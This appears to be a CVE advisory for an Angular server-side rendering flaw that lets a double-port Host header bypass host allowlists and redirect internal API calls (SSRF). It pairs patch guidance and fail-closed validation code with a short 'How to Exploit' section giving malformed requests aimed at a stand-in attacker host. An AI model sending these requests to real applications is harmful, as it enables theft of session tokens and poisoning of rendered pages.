How CVE-2026-46417 Works
The vulnerability stems from a parser discrepancy between the strict WHATWG URL parser used for host allowlist validation and the more lenient Domino URL parser used to initialize the server-emulated DOM. When a server-side request contains a malformed URL with a double port structure (e.g., `http://evil.com:80:80/path`), Node.js's `URL.canParse(url)` logic returns false, causing the host-check validation to be skipped entirely.
However, the same malformed URL is later accepted and parsed leniently by Domino's internal parser, which resolves the origin to `http://evil.com:80`. The Angular SSR HTTP request interceptor (`relativeUrlsTransformerInterceptorFn`) then resolves all relative backend HTTP requests against this adopted origin, effectively executing a Server-Side Request Forgery (SSRF) attack.
Any Angular application using server‑side rendering (@angular/platform-server) and configuring host routing allowlists (allowedHosts) is vulnerable to this allowlist bypass. By sending an HTTP request with a malformed Host header (e.g., Host: evil.com:80:80) or an absolute‑form request URI, an attacker can bypass the allowlist logic entirely, even when a strict default‑deny setup is in place.
The SSR application will then route all relative `HttpClient` outgoing API queries—which commonly carry sensitive credentials, session cookies, and internal authorization tokens—to the attacker‑controlled server instead of the intended backend services. Additionally, the attacker can supply custom payloads back to the emulated DOM, leading to response injection and content poisoning within the rendered HTML served to users.
To successfully exploit this vulnerability, the following environment parameters and application states must all concurrently exist:
– Active Server‑Side Rendering (SSR): The application must be configured to run with Angular SSR (@angular/platform-server).
– Host Header/URI Propagation: The SSR handler must reconstruct the request URL using raw client inputs (such as request Host headers or absolute‑form URIs) and pass it as `config.url` to the rendering API (renderApplication or renderModule).
– Outbound Relative HTTP Requests: The server application must perform outbound backend API requests using relative paths (e.g., this.http.get('/api/data')) that undergo base‑URL interceptor rewriting.
– Enabled Allowed Hosts Check: The server must use the framework‑provided `allowedHosts` options to limit valid server locations.
DailyCVE Form
| Field | Value |
|---|---|
| Platform | @angular/platform-server |
| Version | <19.2.23, <20.3.22, <21.2.15, <22.0.0-rc.2 |
| Vulnerability | Server-Side Request Forgery (SSRF), Host Allowlist Bypass |
| Severity | High (CVSS 8.8) |
| Date | 2026-05-19 |
| Prediction | Patch released on 2026-05-19 (already fixed) |
What Undercode Say
Check for vulnerable versions:
`npm list @angular/platform-server`
If the version is <19.2.23, <20.3.22, <21.2.15, or <22.0.0-rc.2, update immediately.
Update to the patched version:
`npm install @angular/[email protected]`
How to Exploit
1. Craft a malformed HTTP request:
GET / HTTP/1.1
Host: evil.com:80:80
or use an absolute‑form request URI:
GET http://evil.com:80:80/path HTTP/1.1
2. Bypass allowlist validation: The strict WHATWG parser sees an invalid port and skips host checks, while the lenient Domino parser interprets the origin as `http://evil.com:80`.
3. Redirect internal requests: Any relative `HttpClient` request (e.g., `this.http.get('/api/data')`) will be sent to the attacker-controlled server instead of the intended backend.
4. Exfiltrate data: The attacker can read sensitive internal API responses, steal session tokens, and poison the rendered HTML.
Protection
- Upgrade Angular to a patched version:
- v22.0.0-rc.2, v21.2.15, v20.3.22, v19.2.23 or later.
- Manually validate `req.url` before passing to rendering APIs:
```javascript
// Register as application-wide middleware so every request is checked
// before its URL is rebuilt from client input for the rendering API.
app.use((req, res, next) => {
  const allowedHosts = ['localhost:4000', 'trusted-domain.com'];
  // req.headers.host is undefined when the header is absent; includes()
  // then returns false and the request is rejected (fail closed).
  if (!allowedHosts.includes(req.headers.host)) {
    return res.status(403).send('Forbidden');
  }
  next();
});
```
- Avoid using raw client-controlled input for URL construction.
- Implement a middleware to enforce numeric ports and validated hostnames.
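The following is an added example, not code from Angular or from this post. It models the parser discrepancy described under "How CVE-2026-46417 Works" (a check that is skipped when `URL.canParse` fails) beside the fail-closed Host header validation recommended above: a strict grammar that allows at most one numeric port, denial of anything the WHATWG parser rejects, and only then the allowlist comparison. The allowlist entries, the Express-style `(req, res, next)` middleware shape and the `canParseUrl` helper (a try/catch equivalent of `URL.canParse` for older Node releases) are assumptions.

```javascript
// Added example (not Angular's or this post's code): a fail-closed Host header
// check for an SSR entry point, contrasted with the fail-open pattern that the
// parser discrepancy abuses. Allowlist entries and names are assumptions.

const ALLOWED_HOSTS = ['localhost:4000', 'trusted-domain.com']; // constructed allowlist

// Strict grammar for a Host header: a DNS-style name, then at most ONE numeric
// port of 1-5 digits. "evil.com:80:80" cannot match because nothing may follow
// the port.
const HOST_RE = /^((?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*)(?::(\d{1,5}))?$/i;

// Equivalent of URL.canParse() via try/catch so it also runs on older Node releases.
function canParseUrl(candidate) {
  try { new URL(candidate); return true; } catch { return false; }
}

// Fail-open model of the flawed logic: an unparseable URL is not checked at all,
// so a double-port URL passes even against a default-deny allowlist.
function failOpenHostCheck(url, allowed = ALLOWED_HOSTS) {
  if (!canParseUrl(url)) return true; // validation skipped: this is the bug
  return allowed.includes(new URL(url).host);
}

// Fail-closed check: anything the strict grammar or the WHATWG parser rejects is
// denied, and only then is the normalized host compared with the allowlist.
function validateHost(hostHeader, allowed = ALLOWED_HOSTS) {
  if (typeof hostHeader !== 'string' || hostHeader.length === 0) return false;
  const match = HOST_RE.exec(hostHeader);
  if (match === null) return false;
  const port = match[2];
  if (port !== undefined) {
    const n = Number(port);
    if (n < 1 || n > 65535) return false;
  }
  const candidate = `http://${hostHeader}/`;
  if (!canParseUrl(candidate)) return false; // malformed: deny, never skip
  // URL.host drops a scheme-default port, so 'trusted-domain.com:80' normalizes
  // to 'trusted-domain.com' before the comparison.
  return allowed.includes(new URL(candidate).host);
}

// Express-style middleware factory (assumed shape: (req, res, next)) that runs
// before the request URL is rebuilt from client input for the rendering API.
function hostAllowlistMiddleware(allowed = ALLOWED_HOSTS) {
  return (req, res, next) => {
    if (!validateHost(req.headers.host, allowed)) {
      return res.status(403).send('Forbidden');
    }
    next();
  };
}

// Stand-alone demonstration on constructed inputs.
if (typeof require !== 'undefined' && require.main === module) {
  for (const h of ['localhost:4000', 'evil.com:80:80', 'evil.com', 'localhost:99999']) {
    console.log(h.padEnd(16), 'fail-open:', failOpenHostCheck(`http://${h}/path`),
                'fail-closed:', validateHost(h));
  }
}
```

Run it with `node` to see the two checks disagree on `evil.com:80:80`: the fail-open model reports the request as allowed because the URL never parsed, while `validateHost` rejects it at the grammar step. The middleware can be mounted with `app.use(hostAllowlistMiddleware())` ahead of the SSR handler.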
Impact
- Confidentiality breach: Attackers can exfiltrate internal API responses, session cookies, and tokens.
- Internal network probing: Malicious SSRF can scan internal services and metadata endpoints (e.g., AWS IMDS).
- Response injection & content poisoning: Attackers can inject arbitrary HTML/JavaScript into the rendered page, leading to XSS or redirection.
- Bypass of all host‑based allowlists: Even a strict default‑deny allowlist is ineffective.
Patches are available in:
– `22.0.0-rc.2` (or later)
– `21.2.15` (or later)
– `20.3.22` (or later)
– `19.2.23` (or later)
Sources:
Reported By: github.com